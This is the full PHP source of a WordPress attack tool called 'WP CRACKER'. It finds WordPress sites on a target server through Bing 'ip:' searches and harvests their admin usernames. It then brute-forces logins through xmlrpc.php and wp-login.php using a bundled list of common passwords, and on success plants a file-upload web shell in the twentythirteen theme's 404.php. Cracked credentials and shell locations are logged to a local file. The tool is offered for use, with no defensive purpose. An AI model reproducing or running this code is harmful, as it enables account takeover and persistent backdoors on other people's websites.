WP Cracker

1. <title>WP CRACKER</title>
2. <style>
3. body{background-color:#f1f1f1;}
4. input,select,textarea{
5.     border:1px solid #4F4F4F; font-family:Verdana; font-size:11px;
6. }
7. </style>
8. <center>
9. <table cellpadding='5'>
10. <tr><td align=center><h2>WP CRACKER</h2></td></tr>
11. <?php
12. #INJ3CTOR_M4
13. @set_time_limit(0);
14. error_reporting(0);
15.  
16. if(!isset($_POST['brute'])){
17.     echo'<tr><td align="center">';
18.     echo'<b>Server iP:</b>';
19.     echo'<form method="POST">';
20.     echo'<input size="60" type="text" name="ip" placeholder="Put Target Server iP">';
21.     echo'<input type="submit" value="Grab_WP!"></td></tr></table>';
22.     echo'<table cellpadding="5">';
23.     echo'<tr><td align="center"><b>Web-Sites List</b></td><td align="center"><b>Passwords</b></td></tr>';
24.     if(!isset($_POST['ip'])){
25.         echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>';
26.     }else{
27.         $ip = trim($_POST['ip']);
28.         $dorks = array('/?page_id=', '/?p=');
29.         foreach($dorks as $dork){
30.             $query = "ip:$ip $dork";
31.             $allLinks = bingServerCrawler($query);
32.             foreach($allLinks as $link){
33.                 if(eregi("page_id=|p=", $link)){    $link = pathinfo($link)['dirname'];
34.                     $data = get_source($link    .   "/wp-includes/wlwmanifest.xml");
35.                     if(preg_match('#<clientType>WordPress</clientType>#i', $data)){
36.                         $wpLinks[] = $link;
37.                     }
38.                 }
39.             }
40.         }
41.         if(!empty($wpLinks)){   $wpLinks = array_unique($wpLinks);
42.             echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23">';
43.             foreach($wpLinks as $wordpress){
44.                 echo $wordpress ."\r\n";
45.             }
46.             echo'</textarea></td>';
47.         }else{
48.             echo'<tr><td align="center"><textarea name="sites" cols="32" rows="23" placeholder="http://localhost/"></textarea></td>';
49.         }
50.     }
51.     echo'<td><textarea name="passwords" cols="32" rows="23">';
52. echo'
53. 00000
54. 000000
55. 0000000
56. 00000000
57. 0123456789
58. 102030
59. 111111
60. 112233
61. 123
62. 123123
63. 12345
64. 123456
65. 1234567
66. 12345678
67. 123456789
68. 321321
69. 654321
70. admin
71. adminadmin
72. admin123
73. admin123123
74. admin1234
75. admin123456
76. administrator
77. abc123
78. demo
79. qwerty
80. qwerty123
81. passwd
82. password
83. p@ssw0rd
84. passw0rd
85. passwords
86. pass123
87. pass121
88. pass
89. pass1234
90. test
91. test123
92. root
93. toor
94. user
95. welcome1
96. welcome
97. ';
98.     echo'</textarea></td></tr></table>';
99.     echo'<table cellpadding="5">';
100.     echo'<tr><td align="center"><input type="submit" name="brute" value="Start BruteForce!"/></form></td></tr></table>';
101. }else{
102.     $sites = array_unique(array_map("trim", explode("\r\n", $_POST['sites'])));
103.     $passwords = array_unique(array_map("trim", explode("\r\n", $_POST['passwords'])));
104.     $f = fopen('rezult.html', 'a+');
105.     echo'<table border="1" cellpadding="5">';
106.     foreach($sites as $site){
107.         $site = rtrim($site, '/');
108.         vbflush(); # buffer clean
109.         echo"<tr><td><b>Target --> $site</b></td></tr>";
110.         fwrite($f, "<br />target --> <b>$site</b><br />");
111.         $user = admin_wp($site);
112.         echo"<tr><td>Username is: <b>$user</b></td>";
113.         fwrite($f, "Username: <b>$user</b><br />");
114.         $xmlprc = get_source($site  .'/xmlrpc.php');
115.         if(preg_match('#server accepts POST#i', $xmlprc)){
116.             foreach($passwords as $pass){
117.                 if(XMLRPC($site, $user, $pass) == true){
118.                     vbflush(); # buffer clean
119.                     echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>";
120.                     fwrite($f, "Password: <b>$pass</b><br />");
121.                     if(uploadshell($site) == true){
122.                         echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>";
123.                         fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />");
124.                     }else{
125.                         echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>';
126.                     }
127.                     break;
128.                 }else{
129.                     vbflush(); # buffer clean
130.                     echo"<tr><td><font color='red'>$pass NO!</font></td></tr>";
131.                 }
132.             }
133.         }else{
134.             foreach($passwords as $pass){
135.                 if(WP_CRACKER($site, $user, $pass) == true){
136.                     vbflush(); # buffer clean
137.                     echo"<tr><td><b><font color='green'>Password is: $pass</font></b></td></tr>";
138.                     fwrite($f, "Password: <b>$pass</b><br />");
139.                     if(uploadshell($site) == true){
140.                         echo"<tr><td><b><font color='green'>Shell Uploaded: $site/wp-content/themes/twentythirteen/404.php</font></b></td></tr>";
141.                         fwrite($f, "Shell: <b>$site/wp-content/themes/twentythirteen/404.php</b><br />");
142.                     }else{
143.                         echo'<tr><td><font color="red">Can\'t Upload Shell!</font></td></tr>';
144.                     }
145.                     break;
146.                 }else{
147.                     vbflush(); # buffer clean
148.                     echo"<tr><td><font color='red'>$pass NO!</font></td></tr>";
149.                 }
150.             }
151.         }
152.         fclose($f);
153.     }
154. }
155. echo'</table>';
156.  
157. // Functions //
158.  
159. function bingServerCrawler($dork){
160.     $ch = curl_init();
161.     $i = 1;
162.     while($i){
163.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
164.         curl_setopt($ch, CURLOPT_URL, "http://www.bing.com/search?q="   .   urlencode($dork)    .   "&first={$i}");
165.         curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
166.         curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
167.         curl_setopt($ch, CURLOPT_USERAGENT, "SamsungI8910/SymbianOS/9.1 Series60/3.0");
168.         curl_setopt($ch, CURLOPT_ENCODING, "gzip, deflate, compress");
169.         $data = curl_exec($ch);
170.         preg_match_all('#<h2><a href="(.*?)"#i', $data, $matches);
171.         foreach($matches[1] as $link){
172.             $allLinks[] = $link;
173.         }
174.         if(!preg_match('#<div class="sw_next">#i', $data)) break;
175.         $i+=10;
176.     }
177.     curl_close($ch);
178.     if(!empty($allLinks) && is_array($allLinks)){
179.         return array_unique($allLinks);
180.     }
181. }
182.  
183. function get_source($link, $safemode = false, $agent){
184.     if($safemode === true) sleep(1);
185.     if(!$agent){ $agent='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'; }
186.     if(!function_exists('curl_init')){
187.         return file_get_contents($link);
188.     }else{
189.         $ch = curl_init();
190.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
191.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
192.         curl_setopt($ch, CURLOPT_URL, $link);
193.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
194.         curl_setopt($ch, CURLOPT_USERAGENT, $agent);
195.         curl_setopt($ch, CURLOPT_ENCODING, 0);
196.         curl_setopt($ch, CURLOPT_TIMEOUT, 30);
197.         $data = curl_exec($ch);
198.         curl_close($ch);
199.        
200.         return $data;
201.     }
202. }
203.  
204. function admin_wp($wp){
205.     $data = get_source($wp    .    "/?feed=atom");
206.     if(preg_match('#<name>(.*?)</name>#', $data, $user)){
207.         if(strlen($user[1]) > 0 && strlen($user[1]) <= 15){
208.             return $user[1];
209.         }
210.     }else{
211.         $data = get_source($wp    .    "/?author=1");
212.         if(preg_match('#<body class="archive author author-(.*?) author-(.*?)(.*)">#i', $data, $user)){
213.             return $user[1];
214.         }else{
215.             return "admin";
216.         }
217.     }
218. }
219.  
220. function XMLRPC($site, $user, $pass){
221.     $ch = curl_init();
222.     curl_setopt($ch, CURLOPT_URL, $site    ."/xmlrpc.php");
223.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
224.     curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
225.     curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
226.     curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
227.     curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
228.     curl_setopt($ch, CURLOPT_POST, 1);
229.     curl_setopt($ch, CURLOPT_POSTFIELDS, "<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>$user</string></value></param><param><value><string>$pass</string></value></param></params></methodCall>");
230.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
231.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
232.     $data = curl_exec($ch);
233.     curl_close($ch);
234.     return (preg_match('#<name>isAdmin</name>#i', $data)) ? true:false;
235. }
236.  
237. function WP_CRACKER($site, $user, $pass){
238.     $ch = curl_init();
239.     curl_setopt($ch, CURLOPT_URL, $site .'/wp-login.php');
240.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
241.     curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
242.     curl_setopt($ch, CURLOPT_COOKIE, "wordpress_test_cookie=WP+Cookie+check");
243.     curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
244.     curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
245.     curl_setopt($ch, CURLOPT_POST, 1);
246.     curl_setopt($ch, CURLOPT_POSTFIELDS, "log={$user}&pwd={$pass}&wp-submit=Log+In&redirect_to={$site}/wp-admin/&testcookie=1");
247.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
248.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
249.     $data = curl_exec($ch);
250.     curl_close($ch);
251.     return (preg_match('/logout/', $data)) ? true:false;
252. }
253.  
254. function uploadshell($site){
255.     $ch = curl_init();
256.     curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen');
257.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
258.     curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
259.     curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
260.     curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
261.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
262.     $data = curl_exec($ch);
263.     curl_close($ch);
264.     if(preg_match('#name="_wpnonce" value="(.*?)"#', $data, $token)){
265.         $post = "_wpnonce={$token[1]}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Ftheme-editor.php%3Ffile%3D404.php%26theme%3Dtwentythirteen%26scrollto%3D0%26updated%3Dtrue&newcontent=%3C%3Fphp%0Aecho%20%27Uploader%20By%20INJ3CTOR_M4%27%3B%0Aecho%27%0A%3Cform%20method%3D%22post%22%20enctype%3D%22multipart%2fform-data%22%3E%0A%3Cinput%20name%3D%22file%22%20type%3D%22file%22%20%2f%3E%0A%3Cinput%20name%3D%22path%22%20type%3D%22text%22%20value%3D%22%27.getcwd%28%29.%27%22%20%2f%3E%0A%3Cinput%20type%3D%22submit%22%20value%3D%22Up%22%20%2f%3E%0A%3C%2fform%3E%0A%27%3B%0Aif%28isset%28%24_FILES%5B%27file%27%5D%29%20%26%26%20isset%28%24_POST%5B%27path%27%5D%29%29%7B%0A%20%20%20%20if%28move_uploaded_file%28%24_FILES%5B%27file%27%5D%5B%27tmp_name%27%5D%2C%24_POST%5B%27path%27%5D.%27%2f%27.%24_FILES%5B%27file%27%5D%5B%27name%27%5D%29%29%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22green%22%3EFile%20Upload%20Done.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7Delse%7B%0A%20%20%20%20%20%20%20%20echo%20%27%3Cfont%20color%3D%22red%22%3EFile%20Upload%20Error.%3C%2ffont%3E%3Cbr%20%2f%3E%27%3B%0A%20%20%20%20%7D%0A%7D%0A%3F%3E&action=update&file=404.php&theme=twentythirteen&scrollto=0&docs-list=&submit=Update+File";
266.         $ch = curl_init();
267.         curl_setopt($ch, CURLOPT_URL, $site    .'/wp-admin/theme-editor.php');
268.         curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
269.         curl_setopt($ch, CURLOPT_USERAGENT, "Googlebot/2.1 (+http://www.google.com/bot.html)");
270.         curl_setopt($ch, CURLOPT_COOKIEFILE, getcwd()   .'/cookie.txt');
271.         curl_setopt($ch, CURLOPT_COOKIEJAR, getcwd()    .'/cookie.txt');
272.         curl_setopt($ch, CURLOPT_POST, 1);
273.         curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
274.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
275.         $data = curl_exec($ch);
276.         curl_close($ch);
277.         $data = get_source($site    .'/wp-content/themes/twentythirteen/404.php');
278.         return (preg_match('/Uploader By INJ3CTOR_M4/', $data)) ? true:false;
279.     }else{  return FALSE;   }
280. }
281.  
282. function vbflush(){
283.     static $gzip_handler = null;
284.     if($gzip_handler === null){
285.         $gzip_handler = false;
286.         $output_handlers = ob_list_handlers();
287.         if(is_array($output_handlers)){
288.             foreach($output_handlers as $handler){
289.                 if($handler == 'ob_gzhandler'){
290.                     $gzip_handler = true;
291.                     break;
292.                 }
293.             }
294.         }
295.     }
296.     if($gzip_handler){
297.     // forcing a flush with this is very bad
298.         return;
299.     }
300.     if(ob_get_length() !== false){
301.         @ob_flush();
302.     }
303.     flush();
304. }